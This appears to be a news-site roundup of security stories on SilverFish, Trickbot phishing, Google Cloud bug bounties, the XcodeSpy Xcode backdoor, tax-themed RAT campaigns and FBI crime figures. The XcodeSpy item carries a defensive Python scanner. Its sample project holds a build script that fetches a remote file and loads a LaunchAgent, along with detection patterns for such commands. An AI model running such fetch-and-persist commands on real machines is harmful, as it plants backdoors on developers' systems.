More stories

  • VMware acquires Mesh7 for cloud-native application security

    VMware on Thursday announced it plans to acquire Mesh7, a company that secures cloud-native applications and microservices by monitoring application behavior at the API layer. The terms of the deal were not disclosed. Once the acquisition is finalized, VMware plans to integrate Mesh7’s contextual API behavior security product with the VMware Tanzu Service Mesh. The integration “will enable VMware to deliver high fidelity understanding of which application components are talking to which using APIs,” Tom Gillis, VMware SVP and GM of the Networking and Security Business Unit, wrote in a blog post. “Developers and Security teams will each gain a better understanding of when, where and how applications and microservices are communicating via APIs, even across multi-cloud environments, enabling better DevSecOps.” The Mesh7 solution is based on Envoy, an open-source Layer 7 proxy designed for large, modern service-oriented architectures. Envoy is also a foundational component of Tanzu Service Mesh. “Early on, VMware realized Envoy would become the platform for next-generation security services,” Gillis wrote.

  • SolarWinds-linked hacking group SilverFish abuses enterprise victims for sandbox tests

    Cyberattackers involved in worldwide hacking campaigns are using the compromised systems of high-profile victims as playgrounds to test out malicious tool detection rates. 

    On Thursday, Swiss cybersecurity firm Prodaft said that SilverFish, an “extremely skilled” threat group, has been responsible for intrusions at over 4,720 private and government organizations including “Fortune 500 companies, ministries, airlines, defense contractors, audit and consultancy companies, and automotive manufacturers.” Attacks are geared toward US and European entities, with a specific focus on critical infrastructure and targets with a market value of over $100 million. SilverFish has been connected to the recent SolarWinds breach as “one of many” threat groups taking advantage of the situation, in which malicious SolarWinds Orion updates were pushed to customers, leading to the compromise of thousands of corporate networks. In December, following the disclosure of the SolarWinds breach, Prodaft received an analysis request from a client and created a fingerprint based on public Indicators of Compromise (IoCs) released by FireEye. After running IPv4 scans, the team found new detections within 12 hours and then began combing the web for command-and-control servers (C2s) used in the operation while refining fingerprint records. Prodaft says that after obtaining entry to the management C2 control panel, the company was able to verify links to existing SolarWinds security incidents and known victims by way of IP, username, command execution, country, and timestamp records. Victims verified by the company include a US military contractor, a top COVID-19 testing kit manufacturer, aerospace and automotive giants, multiple police networks, European airport systems, and “dozens” of banking institutions in the US and Europe.

    SilverFish is focused on network reconnaissance and data exfiltration and uses a variety of software and scripts for both initial and post-exploitation activities. These include readily available tools such as Empire, Cobalt Strike, and Mimikatz, as well as tailored rootkits, PowerShell, BAT, and HTA files. Prodaft says that SilverFish attackers tend to follow particular behavioral patterns while enumerating domains, including running commands to list domain controllers and trusted domains, as well as displaying stored credentials and admin user accounts. Scripts are then launched for post-exploit reconnaissance and data theft activities. Hacked, legitimate domains are sometimes used to reroute traffic to the C2. However, perhaps the most interesting tactic observed is the use of existing enterprise victims as a sandbox. “The SilverFish group has designed an unprecedented malware detection sandbox formed by actual enterprise victims which enables the adversaries to test their malicious payloads on victim servers with different enterprise AV and EDR solutions, further expanding the high success rate of the SilverFish group attacks,” the company says. The C2 panel also revealed some interesting hints about how SilverFish operates. Panels are set for “Active teams” and appear to account for multiple groups such as Team 301, 302, 303, and 304, with both English and Russian used to write comments on victim records. Work hours appear to stay within 8 am – 8 pm UTC, with far less activity taking place on weekends. Attacker teams seem to cycle every day or so between victims, and whenever a new target is snared, the server is assigned to a particular working group for examination. A ‘test run’ of the SolarWinds Orion compromise was conducted in 2019, whereas Sunburst malware was deployed to clients between March and June 2020.
    SilverFish-SolarWinds attacks began at the end of August 2020 and were conducted in three waves that only ended with the seizure and sinkhole of a key domain. However, the team expects other spying and data theft-related attacks to continue throughout 2021. SilverFish infrastructure has also revealed links to multiple IoCs previously attributed to TrickBot, EvilCorp, WastedLocker, and DarkHydrus. Prodaft cautions that “security analysts should not fully-automize their threat intelligence protocols [..] as acting strictly upon IoC intelligence from third-party resources may be one of the main reasons that prevent researchers from realizing the actual scope of large-scale APT attacks.” “SilverFish are still using relevant machines for lateral movement stages of their campaigns,” the company added. “Unfortunately, despite being large critical infrastructure, most of their targets are unaware of the SilverFish group’s presence on their networks.” As a “very sensitive matter,” Prodaft told ZDNet that victims were not contacted directly. However, the firm’s findings have been shared “with all responsible CERTs, and different law enforcement agencies; so that they can get in touch with the victims as the authorized body and share their findings.”

  • FBI: Phishing emails are spreading this sophisticated malware

    A new spear-phishing campaign is attempting to infect PCs with Trickbot, one of the most prevalent and potent forms of malware around today, a joint advisory from the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) has warned. Trickbot started life as a banking trojan but has become one of the most powerful tools available to cyber criminals, who are able to lease out access to infected machines in order to deliver their own malware – including ransomware. Now its authors are using a new tactic to attempt to deliver it to victims, warns the joint FBI and CISA alert – phishing emails which claim to contain proof of a traffic violation. The hope is that people are scared into opening the email to find out more. The malicious email contains a link which sends users to a website hosted on a server compromised by the attackers, which tells the victim to click on a photo to see proof. When they click the photo, they actually download a JavaScript file which, when opened, connects to a command and control server which will download Trickbot onto their system. Trickbot creates a backdoor onto Windows machines, allowing the attackers to steal sensitive information including login credentials, while some versions of Trickbot are capable of spreading across entire networks. The modular nature of Trickbot means it’s highly customisable, with additional attacks by the malware known to include dropping further malware – such as Ryuk or Conti ransomware – or, until recently, serving as a downloader for Emotet malware. Trickbot is also able to exploit infected machines for cryptomining.

    A coalition of cybersecurity companies attempted to disrupt Trickbot in October last year, but the malware didn’t stay quiet for long, with its cyber criminal authors quickly able to resume their operations. “The takedown efforts in October were unlikely to permanently disrupt or disable this very capable commodity malware that has been active on the threat landscape at scale for years. It has a strong infrastructure and the ability to continue operating,” Sherrod DeGrippo, senior director of threat research and detection at Proofpoint, told ZDNet. “To completely remove Trickbot from the landscape would be extremely difficult and likely require a coordinated international law enforcement effort like we saw with Emotet. In fact, after the actions of October 2020, we saw Trickbot campaigns resume within weeks, and it has been active continually since,” she added. Trickbot remains a powerful tool for cyber criminals and a clear danger for enterprises and organisations of all sizes – but there are measures recommended by CISA and the FBI which can be taken in order to help protect networks from the malware. Providing social engineering and phishing email training to employees can help them to avoid threats by being wary of certain types of messages. Organisations should also be implementing a proper cybersecurity programme with a formalised security patch management process so cyber attackers can’t exploit known vulnerabilities to gain a foothold on the network. It’s also recommended that multi-factor authentication is applied across the enterprise, so malware which steals login credentials to move across the network can’t do so as easily.

  • Google Cloud: Here are the six 'best' vulnerabilities security researchers found last year

    Google has announced the winners of its $313,337 2020 Google Cloud Platform (GCP) bug bounty prize, which was split among just six security researchers. This was the second year Google has run the GCP vulnerability reward program and offered six researchers a share of $313,337, or triple the $100,000 pool it created for the 2019 program. The prizes go to researchers who’ve submitted reports on exceptional security flaws in GCP. So this isn’t a reward for a bug bounty, but an additional prize and recognition for submissions to Google’s vulnerability reward program.


    The first prize of an impressive $133,337 in the 2020 GCP program went to Ezequiel Pereira, a Uruguayan university student and security enthusiast, who found a remote code execution (RCE) flaw in the Google Cloud Deployment Manager. Google paid the $133,337 prize to Pereira on top of a $31,337 reward for the original report he submitted last year, meaning he’s landed $164,674 for this one report. “The bug discovered by Ezequiel allowed him to make requests to internal Google services, authenticated as a privileged service account,” writes Harshvardhan Sharma, an information security engineer at Google. It is a server-side request forgery (SSRF) attack. Pereira started exploring Deployment Manager API methods by enabling it on the Google Cloud Console. From there he went to the metrics page of the console and looked at the Filters section to view a list called Methods, where he found two documented API versions called “v2” and “v2beta”, and also two undocumented API versions called “alpha” and “dogfood”.

    The “dogfood” API piqued his interest because he knew Google uses the term “dogfooding” for its own teams using their software products internally before releasing them to the public. The second prize of $73,331 went to David Nechuta for another SSRF bug in Google Cloud Monitoring that could be used to leak the authentication of the service account used for the service’s uptime check feature. The prize is on top of $31,000 he received for the original report. The third prize of $73,331 was awarded to Dylan Ayrey and Allison Donovan for the report and write-up Fixing a Google Vulnerability. They pointed out issues in the default permissions associated with some of the service accounts used by GCP services. Other recipients included Bastien Chatelard for his report and write-up Escaping GKE gVisor sandboxing using metadata; Brad Geesaman for his report and write-up CVE-2020-15157 “ContainerDrip” Write-up; and Chris Moberly for the report and write-up Privilege Escalation in Google Cloud Platform’s OS Login.

  • Facebook expands support for security keys to iOS and Android

    Facebook is finally expanding its support of physical security keys to mobile devices, the company announced Thursday. Facebook has supported security keys on desktop since 2017 and will now enable iOS and Android users to log in to their account via the physical key.

    A security key is a device that generates an encrypted, one-time security code for use in two-factor authentication (2FA) systems. Modern security keys support a variety of hardware formats, such as USB-A and USB-C, Lightning for iPhone users, and even Bluetooth. In most cases, security codes for 2FA are sent to a user’s phone via text-based SMS message. But security keys go the route of hardware-based authentication, requiring an actual physical device that’s inserted into a device as a second form of identification. Security keys are thought to be more effective at preventing phishing attacks and data breaches than 2FA via SMS, because even if someone’s credentials are compromised, account login is impossible without that physical key. In addition to expanding support for security keys to mobile, Facebook said it also plans to expand its Facebook Protect program availability globally and add more groups outside of political campaigns and candidates in the coming year. The social media giant launched Facebook Protect in 2019 in the US. Facebook doesn’t manufacture its own security keys but is encouraging users to purchase them directly from vendors.

    “Since 2017, we’ve encouraged people that are at high risk of being targeted by malicious hackers: politicians, public figures, journalists and human rights defenders,” Facebook said in a blog post. “We strongly recommend that everyone considers using physical security keys to increase the security of their accounts, no matter what device they use.”

  • Apple developers targeted by new malware, EggShell backdoor

    Malicious Xcode projects are being used to hijack developer systems and spread custom EggShell backdoors. 

    The malware, dubbed XcodeSpy, targets Xcode, an integrated development environment (IDE) used in macOS for developing Apple software and applications. According to research published by SentinelLabs on Thursday, the Run Script feature in the IDE is being exploited in targeted attacks against iOS developers by way of Trojanized Xcode projects freely shared online. Legitimate, open source Xcode projects can be found on GitHub. However, in this case, XcodeSpy projects are offering “advanced features” for animating iOS tab bars — and once the initial build is downloaded and launched, a malicious script is deployed to install the EggShell backdoor. The malicious project explored by the researchers is a ripped version of TabBarInteraction, a legitimate project that has not been compromised. The Run Script of the IDE has been quietly tampered with to connect an attacker’s command-and-control (C2) server to a developer’s project. In particular, Apple’s IDE functionality that allows custom shell scripts to run when an instance of an app is built and launched is the subject of abuse. The C2 is then contacted by the script to pull and download a custom variant of the EggShell backdoor, which installs a user LaunchAgent for persistence.

    Two variants of EggShell have been detected, one of which shares an encrypted string with XcodeSpy. The backdoor is able to hijack the victim developer’s microphone, camera, and keyboard, as well as grab and send files to the attacker’s C2. SentinelLabs says that at least one US organization has been caught up in attacks of this nature and developers in Asia may have also succumbed to the campaign, which was in operation at least between July and October last year. Samples of the backdoors were uploaded to VirusTotal on August 5 and October 13. XcodeSpy was first uploaded on September 4; however, the researchers suspect the attacker may have uploaded the sample themselves in order to test detection rates. “While XcodeSpy appears to be directly targeted at the developers themselves rather than developers’ products or clients, it’s a short step from backdooring a developer’s working environment to delivering malware to users of that developer’s software,” the researchers say. “Consequently, all Apple developers are cautioned to check for the presence of malicious Run scripts whenever adopting third-party Xcode projects.” Back in August, Trend Micro tracked XCSSET malware in Xcode projects, thought to have been spread to compromise Safari browser sessions for phishing, cross-site scripting (XSS) attacks, and the theft of developer data. The team said the discovery ultimately led to a “rabbit hole of malicious payloads.”
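    One way to carry out the check the researchers recommend, listing every Run Script build phase in a third-party Xcode project before building it and flagging script bodies that fetch remote content or touch LaunchAgents, as an added Python example written for this page (not SentinelLabs’ or ZDNet’s code). It relies on the documented project.pbxproj layout, where a Run Script phase is an object with `isa = PBXShellScriptBuildPhase;` and its body in the `shellScript` key; the sample project text and the indicator list are constructed for illustration and are not signatures from the report.

```python
"""List Run Script build phases in an Xcode project.pbxproj and flag review-worthy bodies.

Added example, not code from the SentinelLabs report or the article. pbxproj facts used:
each build phase is an object `<24 hex> /* comment */ = { ... };`, a Run Script phase has
`isa = PBXShellScriptBuildPhase;`, and its body sits in `shellScript = "...";` with C-style
escapes. The indicator list is a review heuristic chosen for this example.
"""
import re
from typing import Dict, List

# Constructed sample (not a real project): an ordinary Sources phase, a harmless lint
# script, and a script that fetches a file and loads a user LaunchAgent, the shape of
# behaviour the story describes. The URL is a reserved .invalid name, not a real host.
SAMPLE_PBXPROJ = r'''// !$*UTF8*$!
{
    objects = {
        ABCDEF0123456789ABCDEF01 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            runOnlyForDeploymentPostprocessing = 0;
        };
        ABCDEF0123456789ABCDEF02 /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            name = Lint;
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        ABCDEF0123456789ABCDEF03 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            name = "Run Script";
            shellPath = /bin/sh;
            shellScript = "curl -fsSL http://example.invalid/stage -o \"$TMPDIR/stage\"\nlaunchctl load ~/Library/LaunchAgents/com.example.agent.plist\n";
        };
    };
    rootObject = ABCDEF0123456789ABCDEF00 /* Project object */;
}
'''

# A flat object (no nested braces); build phase objects are flat, so this is enough here.
OBJECT_RE = re.compile(
    r'(?P<id>[0-9A-F]{24})\s*(?:/\*\s*(?P<comment>[^*]*?)\s*\*/)?\s*=\s*\{(?P<body>[^{}]*)\}'
)
_ESCAPES = {'n': '\n', 't': '\t', '"': '"', '\\': '\\'}


def _unescape(value: str) -> str:
    """Undo the C-style escapes pbxproj uses inside quoted strings."""
    return re.sub(r'\\(.)', lambda m: _ESCAPES.get(m.group(1), m.group(1)), value, flags=re.DOTALL)


def _key(body: str, key: str) -> str:
    """Return the value of `key = value;` in an object body ('' if absent), quoted or bare."""
    m = re.search(r'\b' + re.escape(key) + r'\s*=\s*(?:"(?P<quoted>(?:\\.|[^"\\])*)"|(?P<bare>[^;]+));',
                  body, flags=re.DOTALL)
    if not m:
        return ''
    return _unescape(m.group('quoted')) if m.group('quoted') is not None else m.group('bare').strip()


def scan_pbxproj(text: str) -> List[Dict[str, str]]:
    """Every Run Script build phase with its id, name, interpreter and decoded script body."""
    phases = []
    for m in OBJECT_RE.finditer(text):
        body = m.group('body')
        if _key(body, 'isa') != 'PBXShellScriptBuildPhase':
            continue
        phases.append({'id': m.group('id'),
                       'name': _key(body, 'name') or (m.group('comment') or ''),
                       'shellPath': _key(body, 'shellPath') or '/bin/sh',
                       'script': _key(body, 'shellScript')})
    return phases


# Review heuristics: things a build script rarely needs but this chain relied on
# (a remote fetch, then a LaunchAgent for persistence). Matches mean "read this", not "malware".
INDICATORS = {
    'network fetch': re.compile(r'\b(?:curl|wget|nscurl)\b'),
    'pipe to shell or eval': re.compile(r'\|\s*(?:ba|z)?sh\b|\beval\b'),
    'encoded payload': re.compile(r'\bbase64\b|\bopenssl\s+enc\b'),
    'launch agent / daemon': re.compile(r'LaunchAgents|LaunchDaemons|\blaunchctl\b'),
    'osascript': re.compile(r'\bosascript\b'),
}


def suspicious_indicators(script: str) -> List[str]:
    """Indicator labels matching a script body; an empty list means nothing was flagged."""
    return [label for label, rx in INDICATORS.items() if rx.search(script)]


def review(text: str) -> List[str]:
    """One human-readable line per Run Script phase."""
    lines = []
    for phase in scan_pbxproj(text):
        flags = suspicious_indicators(phase['script'])
        verdict = ('REVIEW: ' + ', '.join(flags)) if flags else 'no indicators'
        lines.append(f"{phase['id']}  {phase['name']!r}  ({phase['shellPath']})  {verdict}")
    return lines


if __name__ == '__main__':
    import sys
    # Pass the path of a project.pbxproj to scan a real project; the default is the sample above.
    source = open(sys.argv[1], encoding='utf-8').read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    print('\n'.join(review(source)))
```

    Run it against `MyApp.xcodeproj/project.pbxproj` before opening a downloaded project in Xcode, since the build phase executes as soon as the project is built; a phase that is flagged deserves a read of its full body rather than an automatic verdict, and an unflagged phase is not a clean bill of health.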

  • US taxpayers targeted in NetWire, Remcos Trojan attack wave

    Researchers have analyzed an active campaign targeting US taxpayers in order to spread both NetWire and Remcos Trojans. 

    The tax season is now upon us and as US residents file their returns ahead of a deadline in April, this is also a prime time for cybercriminals to launch campaigns tailored to take advantage of the annual requirement. Phishing campaigns, unless they are nothing more than mass spray-and-pray attempts, will usually hook on a particular theme or situation to try and elicit enough of a reaction to fool a victim into clicking a malicious link or downloading a malware-laden attachment.  Examples include a ‘fraud’ alert from a bank, demands for student loan repayments, fake criminal investigations by the IRS, or notices from legitimate companies such as PayPal warning of unauthorized transactions.  When it comes to tax season, personal finance-themed phishing emails often include tax return-related content, and this is the hook that the active campaign’s operators have chosen to use.  According to research published by Cybereason on Thursday, the phishing messages come with documents attached that utilize malicious macros to deploy both NetWire and Remcos Remote Access Trojans (RATs).  Phishing document samples revealed that once opened, the content will blur and victims are asked to enable macros and editing in order to view the text. If they accept, a “heavily obfuscated” macro drops a malicious .DLL payload — a dropper for one of the two Trojans — in the /temp directory. 

    The .DLL is then injected into Notepad software and the infection chain continues with the decryption of payload data via an XOR key in order to free up executable code. A connection to a command-and-control (C2) server is established and the OpenVPN client is downloaded, together with a side-loaded trojanized .DLL to maintain remote persistence. This side-loaded .DLL is responsible for unpacking another .DLL, loaded into memory, and injecting it into Notepad. Another package is then pulled from the legitimate image hosting service imgur, and this package — hidden within an image file in a technique known as steganography — is one of the two Trojans. Remcos and NetWire RAT functionality includes taking screenshots, keylogging, stealing browser logs and clipboard data, file harvesting, the theft of OS information, and the ability to download and execute additional malware. The RATs are both commercially available in underground forums and are offered on a cheap Malware-as-a-Service (MaaS) subscription basis, available for as little as $10 per subscription — which keeps the potential criminal customer base of the Trojan variants large. “The use of various techniques such as steganography, storing payloads on legitimate cloud-based services, and exploiting DLL sideloading against a legitimate software makes these campaigns very difficult to detect,” commented Assaf Dahan, Cybereason head of threat research. “The sensitive information collected from the victims can be sold in the underground communities and used to carry out all manner of identity theft and financial fraud.”

  • FBI: One type of scam is costing business the most

    Americans lost over $4.2 billion to cybercriminals and scammers in 2020, according to FBI figures based on complaints it received.  Over the year, the FBI’s Internet Crime Center (IC3) received 791,790 complaints of suspected internet crime, or about 300,000 more than it did in 2019 when the agency recorded estimated losses at more than $3.5 billion. 


    “In 2020, while the American public was focused on protecting our families from a global pandemic and helping others in need, cyber criminals took advantage of an opportunity to profit from our dependence on technology to go on an Internet crime spree,” the FBI says in its Internet Crime Report 2020. Once again, business email compromise (BEC) or email account compromise (EAC) were by far the biggest sources of reported losses, totaling $1.8 billion across 19,369 complaints. That’s up slightly from $1.77 billion in reported losses from 23,775 BEC complaints in 2019. Last year saw a steep rise in BEC complaints stemming from identity theft and funds being converted into cryptocurrency. The identity theft frequently occurred after a victim provided a form of ID to a tech support or romance scammer. The stolen ID would be used to set up a bank account to receive stolen BEC funds and convert those to a less traceable cryptocurrency, according to IC3.

    The technique and switch to cryptocurrency differs from previous years, when a senior executive’s email address may have been spoofed and used to instruct a subordinate to wire funds to the fraudster’s bank account. The FBI report notes that tech support fraud continues to be a growing problem, but recently victims have complained about criminals posing as customer support for banks, utility companies or virtual currency exchanges. While the pandemic caused a brief lull in this type of fraud, losses in this category grew to $146 million, or 171% more than losses from 2019. IC3 received 15,421 complaints from victims in 60 countries. Ransomware is the other threat that won’t go away. The IC3 received 2,474 complaints and reported losses of $29.1 million. The report, however, notes that this is an underestimate as it doesn’t account for victim reports made directly to FBI field offices and agents. “The FBI does not encourage paying a ransom to criminal actors. Paying a ransom may embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Paying the ransom also does not guarantee that a victim’s files will be recovered,” the FBI stresses in the report. The most common type of internet crime reported to IC3 was phishing (including vishing, smishing, and pharming), with 241,342 complaints. This was more than twice the number of phishing complaints IC3 received in 2019.
    Notable rises in reported losses from specific crime types when comparing years (2019 versus 2020) included: confidence fraud/romance ($475 million versus $600 million); corporate data breach ($53 million versus $129 million); investment fraud ($222 million versus $336 million); personal data breach ($120 million versus $194 million); ransomware ($8.8 million versus $29 million); and tech support ($54 million versus $146 million).